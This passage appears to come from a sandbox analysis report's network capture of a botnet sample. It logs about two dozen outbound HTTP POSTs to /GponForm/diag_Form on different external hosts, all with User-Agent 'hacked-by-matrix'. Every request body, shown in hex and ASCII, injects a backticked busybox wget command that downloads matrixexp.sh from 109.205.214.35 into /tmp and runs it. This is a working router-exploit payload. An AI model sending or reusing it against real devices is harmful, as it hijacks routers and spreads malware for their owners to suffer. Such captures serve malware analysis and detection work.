                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        980192.168.2.1345354118.92.216.38443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687046051 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        981192.168.2.1340080118.199.40.114443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687046051 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        982192.168.2.1334192212.11.239.131443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687084913 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        983192.168.2.1353390212.73.213.191443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687217951 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        984192.168.2.1347212212.107.185.9443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687239885 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        985192.168.2.1343406118.205.99.180443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687263966 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        986192.168.2.1336050109.89.152.142443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687271118 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        987192.168.2.135424642.143.167.133443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687277079 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        988192.168.2.134065642.39.203.133443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687306881 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        989192.168.2.1341822109.20.118.217443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687330961 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        990192.168.2.1334730212.133.168.216443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687330961 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        991192.168.2.1349064109.42.69.9443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687334061 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        992192.168.2.134347642.49.92.94443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687349081 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        993192.168.2.1360100118.94.82.65443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687361956 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        994192.168.2.135431042.5.61.157443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687377930 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        995192.168.2.13345005.56.174.101443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687412024 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        996192.168.2.1355650212.210.146.84443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687412024 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        997192.168.2.1350954109.148.173.87443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687412024 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        998192.168.2.1348172109.26.165.165443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687422037 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        999192.168.2.133973642.186.96.121443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687432051 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1000192.168.2.1335272118.184.207.19443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687453985 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1001192.168.2.1345546212.247.50.206443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687459946 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1002192.168.2.1343182109.214.31.125443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.687463045 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
